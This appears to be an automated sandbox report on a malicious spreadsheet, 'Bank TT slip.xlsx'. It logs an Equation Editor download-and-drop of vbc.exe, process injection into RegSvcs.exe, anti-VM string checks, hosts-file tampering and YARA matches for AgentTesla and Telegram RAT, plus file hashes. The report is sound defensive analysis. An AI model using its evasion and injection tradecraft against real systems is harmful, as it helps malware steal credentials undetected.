Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\Public\vbc.exe

Mutant created: \Sessions\1\BaseNamedObjects\JHFJngVRuKk

Source: 5.0.RegSvcs.exe.400000.4.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegSvcs.exe.400000.4.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegSvcs.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegSvcs.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegSvcs.exe.400000.2.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.RegSvcs.exe.400000.2.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EC132 push edx; ret	4_2_002EC139
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E8168 push ebx; ret	4_2_002E8169
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C702F push ss; iretd	4_2_007C704A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C597F push eax; retf 0017h	4_2_007C5980
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C029C push esp; ret	4_2_007C029D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C1359 pushfd ; iretd	4_2_007C135B

Source: initial sample	Static PE information: section name: .text entropy: 7.02001355184
Source: initial sample	Static PE information: section name: .text entropy: 7.02001355184

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_036805F7

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2648	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 316	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2428	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 9258			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 504			Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: EQNEDT32.EXE, 00000002.00000002.962418834.0000000000384000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: EQNEDT32.EXE, 00000002.00000002.962329452.000000000035B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0368067D mov edx, dword ptr fs:[00000030h]

2_2_0368067D

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008	Jump to behavior

Modifies the hosts file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\Public\vbc.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

Yara detected Credential Stealer

Source: Yara match	File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

ID:	626166
Product:	CloudBasic
Start time:	16:57:00
Start date:	13.05.2022
Sample:	Bank TT slip.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	2391e6aa319cba9248661674ac5f2105
SHA1:	bbdb700fd74488cc9f3f3e4d66de6b1321ee94b0
SHA256:	18fa3e8547f1b76b8a53b1169c4b3ed78f1a3efb77163e0698ae3b1faf7efb71
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	F18604D5FC3E2930E85C403E0E80A459	AA0517C10C333F9A9A64EBA154EA915464EBF2BB	46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18D80E7.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	E46357D82EBC866EEBDA98FA8F94B385	76C27D89AB2048AE7B56E401DCD1B0449B6DDF05	B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\194FA29.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3	22FEC44258BA0E3A910FC2A009CEE2AB	BF6749433E0DBCDA3627C342549C8A8AB3BF51EB	5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3095CF2A.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\317DF694.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63404123.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A240C8.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	E46357D82EBC866EEBDA98FA8F94B385	76C27D89AB2048AE7B56E401DCD1B0449B6DDF05	B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1A95BC.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3	22FEC44258BA0E3A910FC2A009CEE2AB	BF6749433E0DBCDA3627C342549C8A8AB3BF51EB	5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
